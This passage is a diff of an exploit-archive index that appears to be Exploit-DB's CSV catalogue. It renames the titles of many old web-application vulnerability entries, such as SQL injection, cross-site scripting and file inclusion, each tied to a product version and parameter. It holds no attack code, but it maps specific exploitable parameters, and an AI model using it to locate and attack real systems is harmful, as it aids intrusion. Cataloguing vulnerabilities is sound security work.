Scripting",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 -27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections",2005-04-10,r0t,php,webapps,0 +27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - 'modules.php' Multiple SQL Injections",2005-04-10,r0t,php,webapps,0 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 -27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php' cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 +27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php?cid' SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 27594,platforms/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 27597,platforms/php/webapps/27597.txt,"KCFinder 2.51 - Local File Disclosure",2013-08-15,DaOne,php,webapps,0 27598,platforms/php/webapps/27598.txt,"Mac's CMS 1.1.4 - Multiple Vulnerabilities",2013-08-15,"Yashar shahinzadeh",php,webapps,0 @@ -29935,7 +29936,7 @@ id,file,description,date,author,platform,type,port 27602,platforms/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",php,webapps,0 27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 -27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 +27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php?itemID' SQL Injection",2006-04-10,r0t,php,webapps,0 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple SQL Injections",2006-04-10,r0t,php,webapps,0 27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 - 'memo.php?itemID' SQL Injection",2006-04-10,r0t,php,webapps,0 27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 @@ -29946,7 +29947,7 @@ id,file,description,date,author,platform,type,port 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - 'viewtopic.php' SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 -27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 +27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - 'Jahr' Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - 'Include.php' SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusions",2006-04-11,SnIpEr_SA,php,webapps,0 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 @@ -29975,25 +29976,25 @@ id,file,description,date,author,platform,type,port 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 -27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 +27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 - 'Page' Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 - 'YearCal.php' Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0 27673,platforms/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps,0 -27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0 +27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - 'Authent.php4' SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0 27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 - 'index.php' Cross-Site Scripting",2006-04-18,botan,php,webapps,0 27676,platforms/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,php,webapps,0 27677,platforms/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro - Multiple SQL Injections",2006-04-19,r0t,php,webapps,0 27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 - 'user.php' SQL Injection",2006-04-19,r0t,php,webapps,0 -27679,platforms/cgi/webapps/27679.txt,"Visale 1.0 - pbpgst.cgi keyval Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27680,platforms/cgi/webapps/27680.txt,"Visale 1.0 - pblscg.cgi catsubno Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 - pblsmb.cgi listno Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27682,platforms/cgi/webapps/27682.txt,"CommuniMail 1.2 - mailadmin.cgi list_id Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 - templates.cgi form_id Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27679,platforms/cgi/webapps/27679.txt,"Visale 1.0 - 'pbpgst.cgi?keyval' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27680,platforms/cgi/webapps/27680.txt,"Visale 1.0 - 'pblscg.cgi?catsubno' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 - 'pblsmb.cgi?listno' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27682,platforms/cgi/webapps/27682.txt,"CommuniMail 1.2 - 'mailadmin.cgi?list_id' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 - 'templates.cgi?form_id' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 -27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - 'addlink_lwp.cgi?url' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - 'edit.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps,0 @@ -30005,26 +30006,26 @@ id,file,description,date,author,platform,type,port 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - 'sendim.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 -27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 +27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - 'login.cgi?Password' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 -28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp?Pattern' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 -28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 +28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmadmin/phonelist.asp?Pattern' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 +28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - 'view_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 -27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 +27710,platforms/php/webapps/27710.txt,"W2B Online Banking - 'SID' Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 -27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 +27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php?catid' SQL Injection",2006-06-05,Luny,php,webapps,0 28694,platforms/php/webapps/28694.txt,"vBulletin 2.3.x - 'global.php' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 -27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - 'MWguest.php' HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 @@ -30039,7 +30040,7 @@ id,file,description,date,author,platform,type,port 27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - 'print.php?cat' SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 -27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php' CK Parameter SQL Injection",2006-05-25,IceShaman,php,webapps,0 +27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php?CK' SQL Injection",2006-05-25,IceShaman,php,webapps,0 27737,platforms/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - 'member.php?member' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27738,platforms/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 @@ -30047,13 +30048,13 @@ id,file,description,date,author,platform,type,port 27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - 'member.php' Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 -27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 +27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 -27757,platforms/asp/webapps/27757.txt,"DUclassified - detail.asp SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0 -27761,platforms/cgi/webapps/27761.txt,"NeoMail - NeoMail.pl sessionid Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 +27757,platforms/asp/webapps/27757.txt,"DUclassified - 'detail.asp' SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0 +27761,platforms/cgi/webapps/27761.txt,"NeoMail - 'NeoMail.pl?sessionid' Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 27763,platforms/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 27767,platforms/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 @@ -30067,40 +30068,40 @@ id,file,description,date,author,platform,type,port 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - 'top.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 -27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 +27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 -27784,platforms/php/webapps/27784.txt,"PlanetGallery - Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 +27784,platforms/php/webapps/27784.txt,"PlanetGallery - 'Gallery_admin.php' Authentication Bypass",2006-04-29,tugr@,php,webapps,0 27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,php,webapps,0 27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - 'signup.php?referral' Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - 'members.php?id' Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 -27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 +27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - 'POS' Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - 'i.php?a' Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,zone14,php,webapps,0 27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - 'viewcat.php' Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 -27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 +27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 -27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 +27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - 'showpic.php?preloadSlideShow' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 -27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 +27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - 'Linkliste.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp?sessionid' SQL Injection",2006-05-03,r0t,asp,webapps,0 -27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27814,platforms/asp/webapps/27814.txt,"CyberBuild - 'browse0.htm?ProductIndex' SQL Injection",2006-05-03,r0t,asp,webapps,0 27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp?sessionid' Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 -27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 +27816,platforms/asp/webapps/27816.txt,"CyberBuild - 'browse0.htm?ProductIndex' Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27817,platforms/asp/webapps/27817.txt,"CyberBuild - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps,0 27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-05,NST,php,webapps,0 -27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 - Validate.php HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 +27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 - 'Validate.php' HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 @@ -30118,24 +30119,24 @@ id,file,description,date,author,platform,type,port 27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",php,webapps,0 27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 -27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 +27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?id' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 -27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - 'All_calendars.asp' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - 'showthread.php' SQL Injection",2006-05-09,Breeeeh,php,webapps,0 -27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 +27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - 'subList.asp?CatID' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27848,platforms/php/webapps/27848.txt,"EImagePro - 'view.asp?Pic' SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 -27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - 'Search_result.asp' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 -27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 +27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - 'diapo.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - 'affich.php?image' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php?rep' 